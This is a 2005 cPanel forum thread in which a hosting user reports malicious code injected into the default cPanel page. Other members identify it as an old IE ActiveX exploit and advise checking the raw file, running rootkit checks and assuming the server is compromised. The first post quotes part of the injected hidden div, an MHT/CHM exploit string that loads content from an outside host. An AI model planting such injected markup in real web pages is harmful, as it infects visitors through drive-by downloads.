The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Help Required!!

Discussion in 'General Discussion' started by surebrowse, Dec 14, 2005.

  1. surebrowse

    surebrowse Member

    Joined:
    Dec 26, 2003
    Messages:
    15
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    India
    Hello,

    I noticed that on our default cpanel page & some clients home page, Norton Antivirus noticed an exploit trying to execute something. The following code is at the bottom of the default cpanel page:

    <div style="POSITION:absolute;VISIBILITY:hidden">
    file://C:\\nosuch.mht!http://kasp.cc/x.chm::/
    x.htm" type="text/x-scriptlet"></object>');}catch(e){}</script></div>

    Not sure what it is or how it got there, but doesn't look good - we want to remove that.
    I don't know how to edit the default cpanel page.
     
  2. NT

    NT Well-Known Member

    Joined:
    May 4, 2004
    Messages:
    137
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    England, UK
    Hi,

    If memory serves me correctly, the default page is in /usr/local/apache/htdocs.

    Thanks,
    Nick.
     
  3. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    There could be two things:

    1) Your server is rooted / someone rogue had root access if the main default cpanel page was changed.

    I would check the actual raw file, /usr/local/apache/htdocs/index.html (or index.php / index.htm) - Check for that code, if it's not there it's probably #2

    2) spyware is rewriting IE pages on the fly and reinfecting the person. That code is an ActiveX exploit, I recognize the .mht(ml) extension, and using .chm to run a program / trojan downloader from back in the day.

    Check that file, if it's infected, I would get Rkhunter, make some cpanel backups, and go on from there.
     
  4. surebrowse

    surebrowse Member

    Joined:
    Dec 26, 2003
    Messages:
    15
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    India
    Hi All,

    Thanks.

    I saw the actual raw file as suggested by HostMerit & delete the code from the page.

    Let me check for few hours, I will update here again.

    AGain thank you for the help.
     
  5. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Please email me at kris@hostmerit.com or let me know your AIM screenname - I can help you check if you've been compromised - Since it's actually in the page, it means someone has had control of the server - I would be very weary and treat the next few hours backing up data, as your server is almost surely compromised.
     
Loading...

Share This Page